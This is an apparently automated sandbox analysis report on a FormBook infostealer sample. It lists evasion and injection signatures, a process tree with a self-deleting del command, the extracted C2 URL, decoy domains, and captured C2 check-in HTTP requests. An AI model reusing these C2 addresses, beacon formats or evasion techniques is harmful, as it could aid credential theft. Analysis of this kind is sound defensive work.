Analysis Report 0O9BJfVJi6fEMoS.exe

Overview

General Information

Sample Name: 0O9BJfVJi6fEMoS.exe
Analysis ID: 356555
MD5: 18ec78e09155c046a203fb4dcbc3593f
SHA1: 40e67eef7c001a8752763616fc9a58170721c27a
SHA256: 01c5ac824171a164473d92187f8031f2bc7103397fe534f56771d8e9589445e0
Tags: exe, Formbook, Yahoo

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • 0O9BJfVJi6fEMoS.exe (PID: 7028 cmdline: 'C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe' MD5: 18EC78E09155C046A203FB4DCBC3593F)
    • 0O9BJfVJi6fEMoS.exe (PID: 3492 cmdline: {path} MD5: 18EC78E09155C046A203FB4DCBC3593F)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autofmt.exe (PID: 6664 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
        • explorer.exe (PID: 6700 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
          • cmd.exe (PID: 6812 cmdline: /c del 'C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.besteprobioticakopen.online/uszn/"], "decoy": ["animegriptape.com", "pcpnetworks.com", "putupmybabyforadoption.com", "xn--jvrr98g37n88d.com", "fertinvitro.doctor", "undonethread.com", "avoleague.com", "sissysundays.com", "guilhermeoliveiro.site", "catholicon-bespeckle.info", "mardesuenosfundacion.com", "songkhoe24.site", "shoecityindia.com", "smallbathroomdecor.info", "tskusa.com", "prairiespringsllc.com", "kegncoffee.com", "clicklounge.xyz", "catholicendoflifeplanning.com", "steelobzee.com", "xiknekiterapia.com", "whereinthezooareyou.com", "maglex.info", "dango3.net", "sqjqw4.com", "theparadisogroup.com", "karthikeyainfraindia.com", "luewevedre.com", "helpwithmynutrition.com", "lengyue.cool", "pbipropertiesllc.com", "glidedisc.com", "sz-rhwjkj.com", "776fx.com", "kamanantzin.com", "grandwhale.com", "trump2020shop.net", "gentilelibri.com", "jarliciouslounge.com", "dgcsales.net", "hypno.doctor", "holidayinnindyairportnorth.com", "buysellleasewithlisa.com", "girishastore.com", "tinynucleargenerators.com", "crystalphoenixltd.com", "lapplify.com", "bailbondinazusa.com", "michaelmery.com", "tripleecoaching.com", "fastenerspelosato.net", "horisan-touki.com", "marketingavacado.com", "centrebiozeina.com", "xn--3etz63bc5ck9c.com", "rhemachurch4u.com", "homeschoolangel.com", "romeysworld.com", "themixedveggies.com", "queendreea.club", "epedalflorida.com", "blutreemg.com", "nongfupingtai.com", "shikshs.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

Unpacked PEs

Source | Rule | Description | Author | Strings
6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
0.2.0O9BJfVJi6fEMoS.exe.3d11730.1.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.0O9BJfVJi6fEMoS.exe.3d11730.1.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          AV Detection:

          Antivirus detection for URL or domain
          Source: www.besteprobioticakopen.online/uszn/ Avira URL Cloud: Label: malware
          Source: http://www.besteprobioticakopen.online/uszn/?I48=5LoNRXVM8eyE2Me8xFE40xCr0JzPAOX0MOzM3KUbBxAS8JEwG8sqp8Wi1O663rh9uwDV&ofrxU=yVMtQLoX Avira URL Cloud: Label: malware
          Found malware configuration
          Source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpack Malware Configuration Extractor: FormBook
          Multi AV Scanner detection for submitted file
          Source: 0O9BJfVJi6fEMoS.exe ReversingLabs: Detection: 21%
          Yara detected FormBook
          Source: Yara match File source: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000000B.00000002.911281407.0000000000FB0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000006.00000002.732150923.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000006.00000002.732300917.0000000001110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.689872337.0000000003CC9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000000B.00000002.911225919.0000000000F80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.0O9BJfVJi6fEMoS.exe.3d11730.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

          Compliance:

          Uses 32bit PE files
          Source: 0O9BJfVJi6fEMoS.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Contains modern PE file flags such as dynamic base (ASLR) or NX
          Source: 0O9BJfVJi6fEMoS.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Binary contains paths to debug symbols
          Source: Binary string: explorer.pdbUGP source: 0O9BJfVJi6fEMoS.exe, 00000006.00000002.733414389.00000000032E0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000000.705470471.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 0O9BJfVJi6fEMoS.exe, 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, explorer.exe, 0000000B.00000002.914570132.000000000512F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 0O9BJfVJi6fEMoS.exe, explorer.exe
          Source: Binary string: explorer.pdb source: 0O9BJfVJi6fEMoS.exe, 00000006.00000002.733414389.00000000032E0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000000.705470471.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe Code function: 4x nop then pop edi 6_2_0040C3CB
          Source: C:\Windows\SysWOW64\explorer.exe Code function: 4x nop then pop edi 11_2_0097C3CB

          Networking:

          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 184.106.16.223:80
          Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 184.106.16.223:80
          Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 184.106.16.223:80
          Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49766 -> 202.66.173.116:80
          Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49766 -> 202.66.173.116:80
          Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49766 -> 202.66.173.116:80
          Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 94.23.162.163:80
          Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 94.23.162.163:80
          Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 94.23.162.163:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor URLs: www.besteprobioticakopen.online/uszn/
          Source: global traffic HTTP traffic detected: GET /uszn/?I48=ilzBSMt+mC5PnIueaE0o4kFNHHW8rQxTZUVxaBcrk7HNT8xc6ayAEkd5Nrf40/DEmyGF&ofrxU=yVMtQLoX HTTP/1.1 Host: www.fastenerspelosato.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /uszn/?I48=52ikA0v5VO8qsylJfSO1DetMiatJe0E1D9rBoJ+nHZYmtxf70roQflY+S8wYouTF3o6y&ofrxU=yVMtQLoX HTTP/1.1 Host: www.sissysundays.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /uszn/?I48=lR8nCh02VBrVevH9DBfx7BVzy1/OBYfsNcE9m+G8n0i7QYmfgEfs3uLKSpan4882ouVy&ofrxU=yVMtQLoX HTTP/1.1 Host: www.whereinthezooareyou.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /uszn/?I48=z5jHb1CZWrsr2p16zetrIsrl3FBZKeiByVV0oSV+dvaqVG1rneJc4YmewlelB8A40GEQ&ofrxU=yVMtQLoX HTTP/1.1 Host: www.fertinvitro.doctor Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /uszn/?I48=hu5lsjyQ8jtyvTSzqUKsO9FdlIq7HJAoGWXF85Byxyx8kG/0QeCZ2D448NGSTsl89HtB&ofrxU=yVMtQLoX HTTP/1.1 Host: www.dgcsales.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /uszn/?I48=QfBSKsl5Vu8QEYvg6r6EpYBO+tHghinNKHDEOdj6/CEQOiVDlwCi9gx1TH+D8HDA3Ujy&ofrxU=yVMtQLoX HTTP/1.1 Host: www.horisan-touki.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /uszn/?I48=L/tqFlZRmZhJZD1iC7RgW0bOgnRBAskMdyXY70yD3QYv5j7RY53hkHd2ZTpB0JeH3WIq&ofrxU=yVMtQLoX HTTP/1.1 Host: www.karthikeyainfraindia.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /uszn/?I48=mPpTgQkduQgKd9eKHDnKxG7Zl5xM97I2KtefNy7cE9uF2W6RPqZ+V0j9JFBrxigWFYGz&ofrxU=yVMtQLoX HTTP/1.1 Host: www.buysellleasewithlisa.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /uszn/?I48=5LoNRXVM8eyE2Me8xFE40xCr0JzPAOX0MOzM3KUbBxAS8JEwG8sqp8Wi1O663rh9uwDV&ofrxU=yVMtQLoX HTTP/1.1 Host: www.besteprobioticakopen.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox View IP Address: 35.246.6.109
          Source: Joe Sandbox View ASN Name: NETMAGIC-APNetmagicDatacenterMumbaiIN
          Source: Joe Sandbox View ASN Name: GOOGLEUS
          Source: Joe Sandbox View ASN Name: OVHFR
          Source: unknown DNS traffic detected: queries for: www.fastenerspelosato.net
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/8.0 X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin Date: Tue, 23 Feb 2021 09:08:03 GMT Connection: close Content-Length: 1245
          Source: 0O9BJfVJi6fEMoS.exe String found in binary or memory: http://code.google.com/feeds/p/topicalmemorysystem/downloads/basic.xml
          Source: 0O9BJfVJi6fEMoS.exe String found in binary or memory: http://code.google.com/p/topicalmemorysystem/
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
          Source: 0O9BJfVJi6fEMoS.exe String found in binary or memory: http://topicalmemorysystem.googlecode.com/files/
          Source: explorer.exe, 00000007.00000002.913073739.0000000002B50000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: 0O9BJfVJi6fEMoS.exe String found in binary or memory: http://www.biblegateway.com/passage/?search=
          Source: 0O9BJfVJi6fEMoS.exe String found in binary or memory: http://www.biblija.net/biblija.cgi?m=
          Source: 0O9BJfVJi6fEMoS.exe String found in binary or memory: http://www.blueletterbible.org/Bible.cfm?b=
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
          Source: 0O9BJfVJi6fEMoS.exe String found in binary or memory: http://www.esvstudybible.org/search?q=
          Source: 0O9BJfVJi6fEMoS.exe String found in binary or memory: http://www.esvstudybible.org/search?q=Whttp://www.blueletterbible.org/Bible.cfm?b=
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
          Source: explorer.exe, 0000000B.00000002.915089078.00000000056C2000.00000004.00000001.sdmp String found in binary or memory: https://www.hugedomains.com/domain_profile.cfm?d=grandwhale&e=com

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara matchFile source: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.911281407.0000000000FB0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.732150923.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.732300917.0000000001110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.689872337.0000000003CC9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.911225919.0000000000F80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.0O9BJfVJi6fEMoS.exe.3d11730.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.911281407.0000000000FB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.911281407.0000000000FB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.732150923.00000000010C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.732150923.00000000010C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.732300917.0000000001110000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.732300917.0000000001110000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.689872337.0000000003CC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.689872337.0000000003CC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.911225919.0000000000F80000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.911225919.0000000000F80000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.0O9BJfVJi6fEMoS.exe.3d11730.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.0O9BJfVJi6fEMoS.exe.3d11730.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_004181B0 NtCreateFile,6_2_004181B0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_00418260 NtReadFile,6_2_00418260
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_004182E0 NtClose,6_2_004182E0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_00418390 NtAllocateVirtualMemory,6_2_00418390
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_004181AC NtCreateFile,6_2_004181AC
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_00418262 NtReadFile,6_2_00418262
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_004182DA NtClose,6_2_004182DA
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679910 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_01679910
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016799A0 NtCreateSection,LdrInitializeThunk,6_2_016799A0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679860 NtQuerySystemInformation,LdrInitializeThunk,6_2_01679860
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679840 NtDelayExecution,LdrInitializeThunk,6_2_01679840
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016798F0 NtReadVirtualMemory,LdrInitializeThunk,6_2_016798F0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679A50 NtCreateFile,LdrInitializeThunk,6_2_01679A50
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679A20 NtResumeThread,LdrInitializeThunk,6_2_01679A20
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679A00 NtProtectVirtualMemory,LdrInitializeThunk,6_2_01679A00
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679540 NtReadFile,LdrInitializeThunk,6_2_01679540
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016795D0 NtClose,LdrInitializeThunk,6_2_016795D0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679710 NtQueryInformationToken,LdrInitializeThunk,6_2_01679710
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679FE0 NtCreateMutant,LdrInitializeThunk,6_2_01679FE0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016797A0 NtUnmapViewOfSection,LdrInitializeThunk,6_2_016797A0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679780 NtMapViewOfSection,LdrInitializeThunk,6_2_01679780
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679660 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_01679660
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016796E0 NtFreeVirtualMemory,LdrInitializeThunk,6_2_016796E0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679950 NtQueueApcThread,6_2_01679950
